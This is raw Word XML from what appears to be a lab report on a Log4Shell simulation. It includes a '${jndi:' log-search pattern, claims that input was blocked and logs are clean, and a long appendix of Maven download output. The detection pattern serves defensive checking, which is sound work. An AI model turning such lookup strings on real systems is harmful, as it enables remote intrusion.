        <w:t xml:space="preserve">I get the output below: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C683337" w14:textId="68332847" w:rsidR="00DB2051" w:rsidRDefault="00DB2051" w:rsidP="00DB2051">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2051">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D9D1DC3" wp14:editId="4E994BDB">
            <wp:extent cx="5943600" cy="655320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="158269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99536" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="655320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D468FA5" w14:textId="64C319D8" w:rsidR="00DB2051" w:rsidRPr="00DB2051" w:rsidRDefault="00DB2051" w:rsidP="00DB2051">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2051">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Explanation: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330F75DC" w14:textId="05843DE1" w:rsidR="00DB2051" w:rsidRPr="00DB2051" w:rsidRDefault="00DB2051" w:rsidP="00DB2051">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2051">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This means: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142E6FD1" w14:textId="565EA1B8" w:rsidR="00DB2051" w:rsidRPr="00DB2051" w:rsidRDefault="00DB2051" w:rsidP="00DB2051">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2051">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The only lines that matched \${jndi: were not from your application logs, but from the startup messages of SLF4J (the logging framework).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54846823" w14:textId="6E04EE1B" w:rsidR="00DB2051" w:rsidRPr="00DB2051" w:rsidRDefault="00DB2051" w:rsidP="00DB2051">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2051">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">There are no log lines showing ${jndi:...} as user input. That means </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2051">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2051">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769BDDEE" w14:textId="77777777" w:rsidR="00DB2051" w:rsidRPr="00DB2051" w:rsidRDefault="00DB2051" w:rsidP="00DB2051">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2051">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Intercepted the malicious input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549DDDC9" w14:textId="77777777" w:rsidR="00DB2051" w:rsidRPr="00DB2051" w:rsidRDefault="00DB2051" w:rsidP="00DB2051">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2051">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Blocked it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47523845" w14:textId="77777777" w:rsidR="00DB2051" w:rsidRDefault="00DB2051" w:rsidP="00DB2051">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2051">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Did NOT log it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C879959" w14:textId="6464AE6B" w:rsidR="00DB2051" w:rsidRPr="00DB2051" w:rsidRDefault="00DB2051" w:rsidP="00DB2051">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically, the Log4Shell is working as intended. We have updated to a secure version, implemented input validation, confirmed logging is clean </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FD5F16" w14:textId="77777777" w:rsidR="00DB2051" w:rsidRPr="00DB2051" w:rsidRDefault="00DB2051" w:rsidP="00DB2051">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7332A3D8" w14:textId="77777777" w:rsidR="000E2C4A" w:rsidRDefault="000E2C4A" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A4AFC6" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42D9346E" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70430E6E" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A8105C8" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7413C00D" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE0A179" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BBCD767" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F6469FB" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47826E33" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C77E77E" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49B9E61E" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41ED33F1" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DFDE4D0" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="000E2C4A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60697C6A" w14:textId="358E26ED"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Appendix A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525B02B0" w14:textId="303AF22D" w:rsidR="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Terminal 1 – All commands and responses including set up all the way to simulating the exploit and securing. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00829BA7" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A43609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m (3.0 kB at 132 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DE22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21.30 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.6.3/maven-3.6.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E817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https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.6.3/maven-3.6.3.pom (26 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C894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21.33 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.6.3/maven-model-3.6.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FD8E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https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.6.3/maven-model-3.6.3.pom (4.1 kB at 178 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4F333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21.36 Downloading from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.2.1/plexus-utils-3.2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6D73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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.2.1/plexus-utils-3.2.1.pom (5.3 kB at 191 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5107A0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21.40 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.6.3/maven-artifact-3.6.3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9314B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https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.6.3/maven-artifact-3.6.3.pom (2.4 kB at 96 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218DB6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21.44 Downloading from central: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.4/org.eclipse.sisu.plexus-0.3.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A1EA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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.4/org.eclipse.sisu.plexus-0.3.4.pom (4.2 kB at 181 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BEC23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21.46 Downloading from central: https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-plexus/0.3.4/sisu-plexus-0.3.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2EA2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https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-plexus/0.3.4/sisu-plexus-0.3.4.pom (14 kB at 597 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5710C0D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21.49 Downloading from central: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.4/org.eclipse.sisu.inject-0.3.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C3A5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https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.4/org.eclipse.sisu.inject-0.3.4.pom (2.6 kB at 109 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A9F5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21.52 Downloading from central: https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-inject/0.3.4/sisu-inject-0.3.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4745EB7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https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-inject/0.3.4/sisu-inject-0.3.4.pom (14 kB at 626 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606631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21.55 Downloading from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7F57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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.pom (7.3 kB at 348 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F41511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21.59 Downloading from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.17/plexus-utils-3.0.17.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D19C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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.17/plexus-utils-3.0.17.pom (3.4 kB at 162 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F719C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21.62 Downloading from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.6.0/plexus-classworlds-2.6.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448D01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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.6.0/plexus-classworlds-2.6.0.pom (7.9 kB at 316 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706D94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21.65 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-shade-plugin/3.2.4/maven-shade-plugin-3.2.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F64B9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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-shade-plugin/3.2.4/maven-shade-plugin-3.2.4.pom (11 kB at 448 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BDD8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21.69 Downloading from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.4/plexus-component-annotations-1.5.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B14B8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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.4/plexus-component-annotations-1.5.4.pom (815 B at 37 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3504E4F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21.71 Downloading from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.5.4/plexus-containers-1.5.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D049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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.5.4/plexus-containers-1.5.4.pom (4.2 kB at 202 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9A93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21.74 Downloading from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.5/plexus-2.0.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411D64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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.5/plexus-2.0.5.pom (17 kB at 560 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA8F9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21.78 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-artifact-transfer/0.12.0/maven-artifact-transfer-0.12.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3074CA9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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-artifact-transfer/0.12.0/maven-artifact-transfer-0.12.0.pom (11 kB at 469 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8E06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21.81 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.0.1/maven-common-artifact-filters-3.0.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6294E8A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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.0.1/maven-common-artifact-filters-3.0.1.pom (4.8 kB at 220 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AE34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21.84 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.1.0/maven-shared-utils-3.1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071B00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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.1.0/maven-shared-utils-3.1.0.pom (5.0 kB at 172 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EDAF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21.87 Downloading from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.1.1/plexus-utils-3.1.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0679162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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.1.1/plexus-utils-3.1.1.pom (5.1 kB at 211 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E549B2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21.90 Downloading from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.5/slf4j-api-1.7.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED038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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.5/slf4j-api-1.7.5.pom (2.7 kB at 122 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551735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21.93 Downloading from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.5/slf4j-parent-1.7.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766657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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.5/slf4j-parent-1.7.5.pom (12 kB at 472 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F47C23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21.96 Downloading from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm/8.0/asm-8.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF37F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https://repo.maven.apache.org/maven2/org/ow2/asm/asm/8.0/asm-8.0.pom (2.9 kB at 109 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E691D0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22.00 Downloading from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm-commons/8.0/asm-commons-8.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118A4E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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-commons/8.0/asm-commons-8.0.pom (3.7 kB at 167 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E547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22.02 Downloading from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm-tree/8.0/asm-tree-8.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F3B8D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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-tree/8.0/asm-tree-8.0.pom (3.1 kB at 149 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4807A9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22.05 Downloading from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm-analysis/8.0/asm-analysis-8.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690B666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https://repo.maven.apache.org/maven2/org/ow2/asm/asm-analysis/8.0/asm-analysis-8.0.pom (3.2 kB at 137 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7563B02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22.08 Downloading from central: https://repo.maven.apache.org/maven2/org/jdom/jdom2/2.0.6/jdom2-2.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6A31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https://repo.maven.apache.org/maven2/org/jdom/jdom2/2.0.6/jdom2-2.0.6.pom (4.6 kB at 148 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E861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22.11 Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-tree/3.0.1/maven-dependency-tree-3.0.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF1DB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https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-tree/3.0.1/maven-dependency-tree-3.0.1.pom (7.5 kB at 341 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528708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22.15 Downloading from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.6/plexus-component-annotations-1.6.pom</w:t>
      </w:r>
    </w:p>
